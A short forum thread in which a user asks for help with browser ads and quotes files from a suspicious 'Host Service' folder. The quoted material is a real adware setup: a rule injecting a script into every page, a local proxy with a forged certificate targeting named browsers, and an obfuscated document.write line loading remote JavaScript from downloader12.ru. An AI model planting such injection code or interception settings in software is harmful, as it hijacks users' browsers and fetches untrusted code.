# Windows folder? or not?



## Spax1 (Sep 25, 2016)

So lately my browsers have been randomly popping ads even from google.com and i have ab+ so i looked through my windows folders and found a little thing called "Host service", checked it's properties and it was only added a few days ago 22nd of September roughly about when these things started happening, in the folder there is:
Another folder called "js" I'm guessing that stands for "java script"
^
inside that folder there is a script file called "js"
back on the main folder there is:
localconfig.json
rules < i opened the file and this piece of code was on it 
"[rules]
@.*@ -> inject js/script.js"

and there was "settings" on the main folder, opened it and there was this code,
"127.0.0.1

[ports] 
80 -> 23129
443 -> 24133


[cert]
C = US
//O = ...
//OU = ...
CN = Orange Sphere


[processes]
opera.exe
firefox.exe
iexplore.exe
chrome.exe

browser.exe
MicrosoftEdge.exe
MicrosoftEdgeCP.exe"
next up there was an uninstall button, which has very strange letters when i opened it but it looked like a basic uninstall.

i will make a download link for this if anyone wants to investigate it but i doubt so.

Ok while writing this i got an idea, so i downloaded notepad++ and opened the js with it, inside i found this code,
"document.write('<sc'+'ript type="text/javascript" src="//downloader12.ru/new/neweu.js"></sc'+'ript>');"

And thats pretty much all. I hope someone can help, i mean with the "settings" script it seems pretty convincing that this is the source of my troubles, but i just want to double-check with a professional.

Thank you for reading,
Spax


----------



## Spax1 (Sep 25, 2016)

oh and one more thing, the folder is located in
"C:\Users\User1\AppData\Local\Host Service"


----------

